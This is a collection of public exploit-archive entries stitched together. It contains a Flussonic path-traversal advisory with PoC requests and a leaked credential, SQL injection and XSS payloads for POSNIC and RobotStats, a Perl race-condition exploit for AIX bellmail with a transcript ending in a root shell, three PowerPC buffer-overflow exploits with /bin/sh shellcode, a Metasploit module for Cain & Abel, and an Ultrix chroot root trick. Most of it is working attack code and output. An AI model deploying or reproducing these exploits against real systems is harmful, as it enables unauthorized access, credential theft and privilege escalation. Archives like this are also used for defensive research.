June 29, 2014
Product & Service Introduction:
========================
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).
Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.
Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3
Vulnerability Disclosure Timeline:
=========================
June 26, 2014 : Contact with Vendor
June 26, 2014 : Vendor Response
June 26, 2014 : Version 4.3.4 Deployed
June 29, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3
Exploitation Technique:
==================
AFR: Remote, Unauthenticated
ADL: Remote, Authenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
Its possible to read any files from the server (with the applications users permissions) by a simple HTTP GET request. Flussonics web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, its possible to login any Flussonic web interface using that method.
2. Arbitrary Directory Listing (Authenticated)
Its possible to list any directories content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:
GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;
live mylive;
file vod {
path priv;
}
2. Proof of Concept ADR Request & Response:
GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
Solution Fix & Patch:
================
Update version 4.3.4
Security Risk:
==========
The risk of the vulnerabilities above estimated as high and medium.
Credits & Authors:
==============
Bilgi Güvenliði Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: http://bga.com.tr/advisories.html
Social: http://twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA

189
exploits/aix/dos/34588.txt Normal file
View file

@ -0,0 +1,189 @@
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
#########################################################################################################
XSS install.php
code :
if(isset($_REQUEST['msg'])) {
$msg=$_REQUEST['msg'];
echo "<p style=color:red>$msg</p>";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
#########################################################################################################
SQL INJECTION : stock.php
code :
include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {
if (strpos(strtolower($line->name), $q) !== false) {
echo "$line->name\n";
}
}
exploit :
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
#########################################################################################################
SQL INJECTION : view_customers.php
code :
$SQL = "SELECT * FROM customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
POST
searchtxt=1(inject)&Search=Search
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################
SQL INJECTION : view_product.php
code :
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
$_GET['limit']=10;
}
$page = $_GET['page'];
if($page)
$start = ($page - 1) * $limit; //first item to display on this page
else
$start = 0; //if no page var is given, set start to 0
/* Get data. */
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
}
$result = mysql_query($sql);
exploit :
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search
#########################################################################################################
UPLOAD : logo_set.php
code :
<?php if(isset($_POST['submit'])){
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
}
else
{
$upload= $_FILES["file"]["name"] ;
$type=$_FILES["file"]["type"];
exploit :
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################
AND MORE BUGS
Bye
#########################################################################################################
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
sec4ever.com & alm3refh.com
#########################################################################################################

111
exploits/aix/dos/35342.txt Normal file
View file

@ -0,0 +1,111 @@
# Title : RobotStats v1.0 HTML Injection Vulnerability
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Twitter : https://twitter.com/milw00rm or @milw00rm
# Date : 22.11.2014
# Demo : http://alpesoiseaux.free.fr/robotstats/
# Download : http://www.robotstats.com/en/robotstats.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
Desc.:
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
and no any filter for html code at robots.lib.php. you can inject your html code or xss code.
html inj.:
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
target.com/robotstats/info-robot.php?robot=(robot id)
or
target.com/robotstats/admin/robots.php you will see your html page
analysis: (/admin/robots.php)
include "robots.lib.php"; //line 26
else if ($rub == "ajouter")
{
updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line)
}
analysis: (/admin/robots.lib.php)
you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject.
function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url)
//line 163 (remember function line 65 in robots.php)
{
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
// dans tous les cas :
echo "<p class='normal'><a class='erreur'> ";
$msg = "";
// test du nom
if ($nom == '') //line 172 control of blank or not blank
{
$msg = $RS_LANG["BadRobotName"];
}
// test selon le mode de detection
if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice
{
if ($user_agent == '') //line 180 control of blank or not blank
{
$msg = $RS_LANG["BadUserAgent"];
}
}
else if ($detection == $RS_DETECTION_IP) //line 185 control of your "detection mode" choice
{
if ( ($ip1 == '') && ($ip2 == '') ) //line 187 control of your "ip1 and ip2" choice
{
$msg = $RS_LANG["IPNotSpecified"];
}
}
else
{
$msg = $RS_LANG["BadDetectionMode"];
}
if ($msg != "")
{
echo $msg;
}
else
{
$liste_champs = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url"; // line 203 no any filter
$liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";
if ($robot > 0) // cas d'une modification et non d'un ajout //line 205 control of your choice "wanna update any bot or add new bot"
{
$liste_champs .= ", id";
$liste_valeurs .= ", '$robot'";
$sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
$res = mysql_query($sql) or erreurServeurMySQL($sql);
echo $RS_LANG["RobotUpdated"];
}
else
{
$sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
$res = mysql_query($sql) or erreurServeurMySQL($sql);
echo $RS_LANG["RobotAdded"];
}
}
for demo:
http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)
or
http://alpesoiseaux.free.fr/robotstats/admin/robots.php
you will see your html page

289
exploits/aix/local/1001.txt Normal file
View file

@ -0,0 +1,289 @@
-bash-2.05b$
-bash-2.05b$ cat x_aix5_bellmail.pl
#!/usr/bin/perl
# FileName: x_aix5_bellmail.pl
# Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail
# command on Aix5 to change any file owner to current user.
#
#Usage : x_aix5_bellmail.pl aim_file
# aim_file : then file wich you want to chown to you.
# Note : Maybe you should run more than one to "Race condition".
# The file named "x_bell.sh" can help you to use this exp.
# You should type "w" "Enter" then "q" "Enter" key on keyboard
# as fast as you can when bellmail prompt "?" appear.
#
# Author : watercloud@xfocus.org
# XFOCUS Team
# http://www.xfocus.net (CN)
# http://www.xfocus.org (EN)
#
# Date : 2004-6-6
# Tested : on Aix5.1.
# Addition: IBM had offered a patch named "IY25661" for it.
# Announce: use as your owner risk!
$CMD="/usr/bin/bellmail";
$MBOX="$ENV{HOME}/mbox";
$TMPFILE="/tmp/.xbellm.tmp";
$AIM_FILE = shift @ARGV ;
$FORK_NUM = 1000;
die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE;
unlink $MBOX;
system "echo abc > $TMPFILE";
system "$CMD $ENV{LOGIN} < $TMPFILE";
unlink $TMPFILE;
$ret=`ls -l $AIM_FILE"`;
print "Before: $ret";
if( fork()==0 )
{
&deamon($FORK_NUM);
exit 0 ;
}
sleep( (rand()*100)%4);
exec $CMD;
$ret=`ls -l $AIM_FILE"`;
print "Now: $ret";
sub deamon {
$num = shift || 1;
for($i=0;$i<$num;$i++) {
&do_real() if fork()==0;
}
}
sub do_real {
if(-e $MBOX) {
unlink $MBOX ;
symlink "$AIM_FILE",$MBOX;
}
exit 0;
}
#EOF
-bash-2.05b$
-bash-2.05b$ cat x_bellmail.sh
#!/bin/sh
#File:x_bellmail.sh
#The assistant of x_aix5_bellmail.pl
#Author : watercloud@xfocus.org
#Date :2004-6-6
#
X_BELL_PL="./x_aix5_bellmail.pl"
AIM=$1
if [ $# ne 1 ] ;then
echo "Need a aim file name as argv."
exit 1;
fi
if [ ! -e "$1" ];then
echo "$1 not exist!"
exit 1
fi
if [ ! -x "$X_BELL_PL" ];then
echo "can not exec $X_BELL_PL"
exit 1
fi
ret=`ls -l $AIM`
echo $ret; echo
fuser=`echo $ret |awk '{print $3}'`
while [ "$fuser" != "$LOGIN" ]
do
$X_BELL_PL $AIM
ret=`ls -l $AIM`
echo $ret;echo
fuser=`echo $ret |awk '{print $3}'`
done
echo $ret; echo
#EOF
-bash-2.05b$ id
uid=201(cloud) gid=1(staff)
-bash-2.05b$
-bash-2.05b$ oslevel
5.1.0.0
-bash-2.05b$ oslevel -r
5100-01
-bash-2.05b$ ls -l /usr/bin/bellmail
-r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cp /etc/passwd /tmp/
-bash-2.05b$ ./x_bellmail.sh /etc/passwd
./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:30 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:35 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:40 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:43 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
w
From cloud Sun Jun 6 08:49:48 2004
abc
? From cloud Sun Jun 6 08:25:20 2004
abc
? w
bellmail: cannot append to /home/cloud/mbox
? w
bellmail: cannot append to /home/cloud/mbox
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:56 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:50:01 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd
-bash-2.05b$ su cloud
cloud's Password:
3004-502 Cannot get "LOGNAME" variable.
-bash-2.05b$ id
uid=201 gid=1(staff)
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd
-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:0:1::/home/cloud:/usr/local/bin/bash
test:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ su cloud
cloud's Password:
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b# ls -l /etc/passwd
-rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd
bash-2.05b# cp /tmp/passwd /etc/passwd
bash-2.05b# chown root /tmp/passwd
bash-2.05b# ls -l /tmp/passwd
-rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b#
bash-2.05b# rm /tmp/.bel*
bash-2.05b# rm /tmp/passwd
bash-2.05b#
# milw0rm.com [2005-05-19]

99
exploits/aix/local/1044.c Normal file
View file

@ -0,0 +1,99 @@
/*
*
* IBM AIX netpmon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/netpmon";
args[1] = "-O";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/netpmon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]

100
exploits/aix/local/1045.c Normal file
View file

@ -0,0 +1,100 @@
/*
*
* IBM AIX ipl_varyon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/sbin/ipl_varyon";
args[1] = "-d";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]

99
exploits/aix/local/1046.c Normal file
View file

@ -0,0 +1,99 @@
/*
*
* IBM AIX paginit root exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 8000
#define EGGSIZE 4003
#define NOP 0x60
#define ADDRESS 0x2ff22fff-EGGSIZE
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+2);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/paginit";
args[1] = buffer;
args[2] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/paginit", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]

73
exploits/aix/local/16659.rb Executable file
View file

@ -0,0 +1,73 @@
##
# $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Cain & Abel <= v4.9.24 RDP Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
and below. An attacker must send the file to victim, and the victim must open
the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2008-5405' ],
[ 'OSVDB', '50342' ],
[ 'URL', 'http://www.milw0rm.com/exploits/7329' ],
[ 'BID', '32543' ],
],
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Tested ok patrickw 20090503
[ 'Windows XP SP2 English', { 'Ret' => 0x7c82385d } ], #call esp
[ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], #jmp esp
[ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
],
'Privileged' => false,
'DisclosureDate' => 'Nov 30 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'exploit_cain.rdp']),
], self.class)
end
def exploit
filerdp = rand_text_alpha_upper(8206)
filerdp << [target.ret].pack('V') + [target.ret].pack('V')
filerdp << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(filerdp)
end
end

13
exploits/aix/local/19041.txt Normal file
View file

@ -0,0 +1,13 @@
source: https://www.securityfocus.com/bid/17/info
By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.
$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login
Then login as root with no password. chmod /tmp/bin/sh
